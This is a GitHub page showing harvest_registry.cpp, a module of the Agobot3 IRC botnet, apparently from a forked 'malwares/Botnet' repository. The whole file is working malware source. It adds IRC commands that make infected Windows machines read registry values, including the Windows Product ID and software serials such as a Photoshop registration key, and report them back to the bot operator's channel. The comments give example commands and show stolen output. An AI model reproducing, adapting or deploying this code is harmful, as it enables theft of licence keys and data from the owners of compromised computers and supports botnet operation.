forked from malwares/Botnet
-
Notifications
You must be signed in to change notification settings - Fork 0
/
harvest_registry.cpp
128 lines (87 loc) · 4.47 KB
/
harvest_registry.cpp
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
/* Agobot3 - a modular IRC bot for Win32 / Linux
Copyright (C) 2003 Ago
This program is free software; you can redistribute it and/or
modify it under the terms of the GNU General Public License
as published by the Free Software Foundation; either version 2
of the License, or (at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program; if not, write to the Free Software
Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA. */
/*
!harvest.registry Software\\Microsoft\\Windows\\CurrentVersion ProductId
!harvest.registry SOFTWARE\\Adobe\\Photoshop\\7.0\\Registration SERIAL
finally fixed the space problem but you must use quotes like this.
<@ytrewq> !harvest.registry "Software\Axialis\Internet Access" "ProxyPort"
<+ya3n2sj> Found registry Info from HKEY_CURRENT_USER: (8333).
*/
#include "main.h"
#include "mainctrl.h"
#include "harvest_registry.h"
void CHarvest_Registry::Init()
{
REGCMD(m_cmdRegistry, "harvest.registry", "makes the bot get registry info from exact registry path", false, this);
REGCMD(m_cmdWindowsKeys, "harvest.windowskeys", "makes the bot get windows registry info", false, this);
}
bool CHarvest_Registry::HandleCommand(CMessage *pMsg)
{
if(!pMsg->sCmd.Compare("harvest.registry"))
{
#ifdef WIN32
HKEY hkey=NULL;
DWORD dwSize=128;
unsigned char szDataBuf[128];
LONG lRet=RegOpenKeyEx(HKEY_CURRENT_USER, pMsg->sChatString.Token(1, " ", false).CStr(), 0, KEY_READ, &hkey);
if(RegQueryValueEx(hkey, pMsg->sChatString.Token(2, " ", false).CStr(), NULL, NULL, szDataBuf, &dwSize)==ERROR_SUCCESS)
g_pMainCtrl->m_cIRC.SendFormat(pMsg->bSilent, pMsg->bNotice, pMsg->sReplyTo.Str(), \
"Found registry Info from HKEY_CURRENT_USER: (%s).", szDataBuf);
RegCloseKey(hkey);
///////////
dwSize = 128; lRet = RegOpenKeyEx(HKEY_LOCAL_MACHINE, pMsg->sChatString.Token(1, " ", false).CStr(), 0, KEY_READ, &hkey);
if(RegQueryValueEx(hkey, pMsg->sChatString.Token(2, " ", false).CStr(), NULL, NULL, szDataBuf, &dwSize)== ERROR_SUCCESS)
g_pMainCtrl->m_cIRC.SendFormat(pMsg->bSilent, pMsg->bNotice, pMsg->sReplyTo.Str(), \
"Found registry Info from HKEY_LOCAL_MACHINE: (%s).", szDataBuf);
RegCloseKey(hkey);
//////////////
dwSize = 128; lRet = RegOpenKeyEx(HKEY_CURRENT_CONFIG, pMsg->sChatString.Token(1, " ", false).CStr(), 0, KEY_READ, &hkey);
if(RegQueryValueEx(hkey, pMsg->sChatString.Token(2, " ", false).CStr(), NULL, NULL, szDataBuf, &dwSize)== ERROR_SUCCESS)
g_pMainCtrl->m_cIRC.SendFormat(pMsg->bSilent, pMsg->bNotice, pMsg->sReplyTo.Str(), \
"Found registry Info from HKEY_CURRENT_CONFIG: (%s).", szDataBuf);
RegCloseKey(hkey);
/////////////////
dwSize = 128; lRet = RegOpenKeyEx(HKEY_CLASSES_ROOT, pMsg->sChatString.Token(1, " ", false).CStr(), 0, KEY_READ, &hkey);
if(RegQueryValueEx(hkey, pMsg->sChatString.Token(2, " ", false).CStr(), NULL, NULL, szDataBuf, &dwSize)== ERROR_SUCCESS)
g_pMainCtrl->m_cIRC.SendFormat(pMsg->bSilent, pMsg->bNotice, pMsg->sReplyTo.Str(), \
"Found registry Info from HKEY_CLASSES_ROOT: (%s).", szDataBuf);
RegCloseKey(hkey);
/////////////////////
dwSize = 128; lRet = RegOpenKeyEx(HKEY_USERS, pMsg->sChatString.Token(1, " ", false).CStr(), 0, KEY_READ, &hkey);
if(RegQueryValueEx(hkey, pMsg->sChatString.Token(2, " ", false).CStr(), NULL, NULL, szDataBuf, &dwSize)== ERROR_SUCCESS)
g_pMainCtrl->m_cIRC.SendFormat(pMsg->bSilent, pMsg->bNotice, pMsg->sReplyTo.Str(), \
"Found registry Info from HKEY_USERS: (%s).", szDataBuf);
RegCloseKey(hkey);
#endif // WIN32
}
/*
your friend need some windows keys and youo found that you cant get them cause of your setting in config.
This is backup ;)
Glow
*/
if(!pMsg->sCmd.Compare("harvest.windowskeys"))
{
#ifdef WIN32
HKEY hkey=NULL;
DWORD dwSize=128;
unsigned char szDataBuf[128];
dwSize = 128; LONG lRet = RegOpenKeyEx(HKEY_LOCAL_MACHINE, "Software\\Microsoft\\Windows\\CurrentVersion", 0, KEY_READ, &hkey);
if(RegQueryValueEx(hkey, "ProductId", NULL, NULL, szDataBuf, &dwSize)== ERROR_SUCCESS)
g_pMainCtrl->m_cIRC.SendFormat(pMsg->bSilent, pMsg->bNotice, pMsg->sReplyTo.Str(), \
"Found Windows Product ID (%s).", szDataBuf);
RegCloseKey(hkey);
#endif // WIN32
}
return true;
}